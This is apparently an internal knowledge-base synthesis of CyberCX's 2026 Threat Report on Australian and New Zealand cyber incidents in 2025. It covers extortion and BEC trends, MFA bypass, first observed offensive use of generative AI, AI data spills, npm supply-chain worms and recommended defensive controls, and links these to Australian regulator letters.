CyberCX 2026 Threat Report — Synthesis
Source: CyberCX, 2026 Threat Report (annual DFIR retrospective covering calendar-year 2025 incidents). Australia/New Zealand edition. Foreword: Hamish Krebs, Global Executive Director, Digital Forensics and Incident Response, CyberCX. Note on date: the report’s exact publication date is not pinned on the cover or in the captured text; the source_date here is the date the PDF was deposited to the Drive inbox. Note on retrieval: Drive PDF was machine-read in full via the Drive MCP. No anti-bot chain was needed.
Headline message
CyberCX’s 2026 report is the first edition in which cyber extortion overtook business email compromise (BEC) as the most common incident type (26% vs 23%), and Financial and Insurance Services overtook Healthcare as the most-impacted sector (18% vs 12%). Three structural shifts dominate the year: threat actors are starting to use generative AI offensively for the first time in CyberCX’s response data; multi-factor authentication is now being routinely bypassed via adversary-in-the-middle (AITM) session hijacking; and the economics of double-extortion are softening — many ransomware crews are no longer bothering to publish stolen data on their dedicated leak sites, with the share of non-published exfil cases rising from ~10% to ~38% year-over-year. The foreword’s framing is blunt: “The threats are bigger and better resourced, and the risks are worse than they have ever been.”
The report explicitly notes that “Generative AI was not used in the process of compiling this report,” an unusual production-disclosure for a 2026 industry publication.
Key takeouts
- Cyber extortion is now the #1 incident category at 26%, displacing BEC (23%); malware-related incidents almost doubled to 13% (from 8%), reversing several years of decline, driven primarily by ClickFix / fake-CAPTCHA social engineering pushing users to paste malicious PowerShell into the Run dialog.
- Financial and Insurance Services took the top sector slot for the first time (18%, up from ~11% in 2024); also moved into the cyber-extortion top three. Healthcare dropped to #2 (12%) but remains #1 for BEC — explained as small/medium clinics with low maturity and MSP-outsourced IT. Government remains the #1 espionage target; Education is the #1 espionage target outside government and #3 overall.
- First observed use of offensive GenAI: “For the first time, CyberCX saw threat actors using generative AI to create custom, bespoke scripts and payloads to reduce the time between initial access and achieving their objectives.” In one case the indicators included “use of emojis in the code, and tutorial-style descriptions in code comments”; the operator’s target (decrypting an internal password-manager database) was ultimately unsuccessful, but the barrier to entry has dropped.
- MFA is no longer a meaningful boundary against BEC. “Every BEC incident CyberCX responded to where traditional MFA was enforced, such as time-based one-time passwords (TOTP) or push notifications, involved session hijacking.” Phishing-as-a-service kits Tycoon and Sneaky 2FA productise AITM proxies; ~17% of 2025 BEC cases also involved attacker-registered OAuth apps (PerfectData Software, emClient, Foxmail) for persistent mailbox sync that survives password reset.
- Time-to-detect (TTD) for financially motivated incidents nearly tripled from 24 to 68 days; espionage TTD fell from 404 to 148 days. CyberCX argues part of the espionage drop reflects attackers caring less about detection — “the cyber equivalent of ‘what are you going to do about it?‘” — rather than purely defender improvement.
- AI data spills appeared for the first time in CyberCX’s casebook: staff pasting sensitive corporate data into public AI portals, with no enterprise licensing, no DLP, no network logging — meaning the spill is often unquantifiable. “2025 was the first year that CyberCX’s DFIR team was engaged for these types of AI data spill incidents.”
Wider context
The report’s empirical picture backs the AU regulator narrative captured elsewhere in this KB. APRA’s 30 April 2026 letter and ASIC’s 8 May 2026 cyber letter both warn that AI-related risk is accelerating attack volume and sophistication while defensive practices lag (see 2026-05-08-apra-ai-governance). CyberCX’s 2025 incident data is precisely the kind of operational evidence those letters reference without naming — especially the Financial Services sector now being most-impacted (consistent with APRA’s “highly regulated, complex digital environments, third-party infrastructure” rationale), and AI both used by attackers and introduced as new defender liability via data spills.
The defender-side counterweight is captured in 2026-04-21-firefox-mythos-zero-days — Mozilla finding 271 vulnerabilities in Firefox via Claude Mythos Preview — but CyberCX’s report does not mention Mythos, and is silent on AI-driven defensive analysis as a control. The asymmetry is notable: a major AU/NZ DFIR practice has now seen offensive GenAI in the wild but does not yet position frontier-AI defensive analysis as table-stakes. The “use AI to scan” recommendation is present, but framed as one of nine drivers, not the keystone control.
The report is also notably silent on AU regulatory hooks. APRA, ASIC, OAIC, the Privacy Act reform, SOCI Act — none appear. The only Australian regulator the report engages is ASD via the Essential Eight, recommended as a foundational control set. For a report aimed at AU/NZ boards in 2026, that is a striking gap given how live the APRA / ASIC / OAIC overlay is for the same audience.
Section-by-section breakdown
1. Foreword (Hamish Krebs)
Sets the strategic frame. “The threats are bigger and better resourced, and the risks are worse than they have ever been.” Invokes “sophisticated state-backed prepositioning intrusions into western critical infrastructure and espionage against telecommunications networks” without naming China or Russia (outside the later ShadowPad attribution to “China’s Ministry of State Security and People’s Liberation Army”). Borrows Ciaran Martin’s “cyber thieves vs cyber thugs” distinction. Argues AI accelerates ransomware, scams, and BEC in “velocity and viciousness.”
2. Incident-type taxonomy (2025)
The 2025 distribution: cyber extortion 26%, BEC 23%, other unauthorised access 22%, malware 13%, website compromise 6%, third-party compromise 5%, data spill 3%, insider 2%.
The motivation mix: financial 59%, unknown 35% (up from 27% in 2024), espionage 4%, retaliation 2%. Unknown-motivation rise is unexplained but plausibly reflects attackers being faster to objective, leaving less behaviour to attribute.
3. Sector breakdown
| Sector | 2025 | 2024 |
|---|---|---|
| Financial & Insurance Services | 18% | ~11% |
| Healthcare | 12% | 17% |
| Education | 11% | n/a |
| Information Media & Telco | 9% | n/a |
| Manufacturing | 8% | n/a |
CyberCX’s reading of Financial Services taking #1: “high-value assets, sensitive data and time-critical operations; as well as being highly regulated. Complex digital environments, often spanning third-party infrastructure and legacy systems.” Education’s exposure: research environments, unmonitored internet-facing assets, shadow IT, student/BYOD networks, weak segmentation, and a “culture of academic freedom” that frustrates control.
4. Cyber extortion deep-dive
- Akira alone accounted for 21% of cyber extortion cases CyberCX responded to; was repeatedly the fastest group, with multiple incidents going from initial access to objective in under 24 hours, and a recorded minimum of 3 hours. Maximum observed time-to-completion: 467 days.
- At least 16 distinct extortion groups observed across CyberCX responses in 2025.
- C2-framework use is declining: Cobalt Strike-style frameworks dropped from 45% (2022) → 17% (2025), as crews shift to legitimate RMM tooling (AnyDesk, Atera, RustDesk, ScreenConnect, Splashtop) — a “living-off-trusted-tools” pattern that defeats signature-based detection.
- Initial access stays remarkably stable across years: valid accounts + external remote services (T1078 + T1133), brute force against RDP (T1110), and exploitation of public-facing applications (T1190). Note: information stealers exposed >204 million credentials globally in 2025, per CyberCX Intelligence.
- Double-extortion economics are weakening: 38% of confirmed-exfil ransomware victims were not published on a DLS at all (up from 10%), and 50% of DLS-listed non-payers had their data quietly not published (up from 24%). “Data-breach fatigue” is named as the proximate cause. CyberCX also notes several incidents where claimed exfiltrated data turned out to be “nothing more than publicly available data scraped from web portals or open APIs.”
- DLL sideloading is migrating from espionage into cyber-extortion tradecraft, used to evade EDR — an artefact of attacker professionalisation.
5. Business email compromise
- BEC TTD: 30 → 20 → 12 → 19 days (2022 → 2025). Invoice-fraud cases had longest TTD (60 days); phishing-distribution cases the shortest (15).
- BEC objectives: invoice fraud 42%, additional phishing 25%, unknown 33%. Largest single BEC loss observed: “in the tens of millions.”
- The MFA-bypass observation is the cleanest “narrative break” in the report — see Key takeouts above.
- ~17% of 2025 BEC cases involved attacker-registered OAuth apps for mailbox sync — PerfectData Software, emClient, Foxmail — which persist past credential reset and password rotation; admin approval for high-risk scopes is the recommended block.
6. Espionage
- TTD compression is the headline (404 → 148 days). CyberCX’s interpretation: improved detection accounts for some, but actors “caring less if we do detect them” explains the rest.
- ShadowPad is the named tooling pattern — “largely privately sold, distributed and used by threat groups attributed to China’s Ministry of State Security and People’s Liberation Army” — a modular RAT with host info, file/registry, command exec, keylogging, and screen capture plugins.
- DPRK insider case study: one organisation inadvertently hired three North Korean IT workers across application development and network architecture teams. “All three company laptops were being shipped to the same address” was the only indicator. Forensics found no malicious activity; managers described them as “good at their jobs, quiet and otherwise unremarkable employees.” The laptop-farm pattern is the signature.
7. AI in the casebook
Two distinct AI surfaces appear in the 2025 data:
- Offensive (first observation): GenAI used by threat actors to write “custom, bespoke scripts and payloads” — quality described as “dubious,” indicators included emoji-in-code and tutorial-style comments, but the trend is the point, not the artefact quality.
- Defensive-liability (first observation): AI data spills as a new DFIR engagement type. The pattern: staff use external AI portals from corporate endpoints, with no enterprise licence, no DLP, no logging — making the spill unquantifiable in scope. Recommended response stack: data cleansing/labelling/governance, staff education, layered DLP (network + endpoint + data).
What the report does not cover: defensive use of frontier AI for vulnerability discovery (cf. Mozilla–Anthropic’s Firefox 150 result in 2026-04-21-firefox-mythos-zero-days); quantum computing (the word “quantum” does not appear); APRA/ASIC/OAIC obligations layered onto incident response.
8. Supply-chain and software-supply-chain incidents
- DarkEngine campaign compromised at least 2,353 unique WordPress sites via WP Engine credential phishing combined with ClickFix.
- Shai-Hulud npm worm went from v1.0 to v3.0 in 2025 — the first successful self-propagating worm in the npm ecosystem, using stolen tokens to publish infected versions of further packages. The s1ngularity/Nx, debug/chalk crypto-clipper, and eslint-config-prettier compromises sit in the same cluster. Implication: package managers are now wormable, and dependency hygiene is not a sufficient control on its own.
9. “Securing your organisation in 2026” — recommended controls
Mapped to nine drivers; key ones:
- Phishing-resistant MFA (FIDO/WebAuthn, passkeys) as the upgrade path from TOTP/push, given universal AITM bypass observed in 2025.
- Token Protection / Conditional Access to constrain session hijacking even when MFA is bypassed.
- Lock down OAuth app registration and require admin approval for high-risk scopes.
- EDR coverage and configuration discipline across the whole estate (the malware doubling is partly an EDR coverage problem).
- Application control / allowlisting to mitigate DLL sideloading.
- Disable the Run dialog via GPO, configure PowerShell execution policies, browser hardening — specifically to defeat ClickFix.
- Dark/open-web credential monitoring with automated resets; enterprise password managers.
- Adopt the ASD Essential Eight as a baseline; NIST CSF noted as the international analogue.
Action implications / open questions
- Reset of the MFA conversation. For AU regulated entities, “MFA enforced” is no longer a credible answer to a BEC control question. Phishing-resistant MFA needs to be the asked-and-answered standard; APRA’s “preventative technical controls > policy / detective controls” critique in 2026-05-08-apra-ai-governance now has direct CyberCX-data backing.
- Sectoral implication for Financial Services boards. Most-impacted in 2025 + most-regulated for AI in 2026 (APRA letter + ASIC letter) = the strongest case yet for treating cyber and AI risk as a single integrated programme with continuous assurance, not annual penetration tests.
- AI data-spill as a category. This is the operational analogue of the APRA “use of enterprise AI tools outside approved control frameworks” gap — and at present sits below the radar of most AI policies because policy is about adoption, not staff use of free portals. DLP and AI-aware proxy/CASB controls become foundational.
- First-observed offensive GenAI deserves trend-watching, not panic. Quality was poor; the operator failed. But the trajectory is what matters: 2025 = first observation, 2026 = where? CyberCX’s “use AI scanning and run AI-specific tabletop exercises” recommendation is the right operational hook.
- The DLS economics shift may change incident-response game-theory. If a third of victims who do get exfil’d are not published, public-disclosure decisions (regulator notification, customer comms, ASX continuous disclosure for listed entities) can no longer be triggered by “is this on a leak site.” Internal forensic confirmation is now the only honest trigger.
- Open question: why no APRA / ASIC / OAIC engagement in the report? A regulator-fluent AU DFIR practice writing for AU/NZ boards should plausibly tie the operational picture to live regulatory expectations. Possible explanations: deliberate scope (report stays operational), regulatory-relations caution, or simply not the audience the report is pitched at.
- Open question: where does this report sit relative to ASD’s Annual Cyber Threat Report and CyberCX’s own STA Hack Report 2026 (already in this workspace’s Drive inbox, awaiting synthesis)? Cross-reading across all three is the next obvious analytical step and will inform whether a dedicated
cyber-threat-landscape-audossier is warranted.
Links
- Topic dossiers: ai-governance-au · ai-security-defense
- Entities: cybercx · hamish-krebs
- Related syntheses: 2026-05-08-apra-ai-governance (regulator framing this empirical picture supports) · 2026-04-21-firefox-mythos-zero-days (defender-side AI counterpart absent from this report) · 2026-05-10-vizza-chrome-silent-llm (embedded-AI supply-chain failure mode the report does not address)
- Companion source pending: CyberCX STA Hack Report 2026 (in Drive
source-files/, not yet synthesised)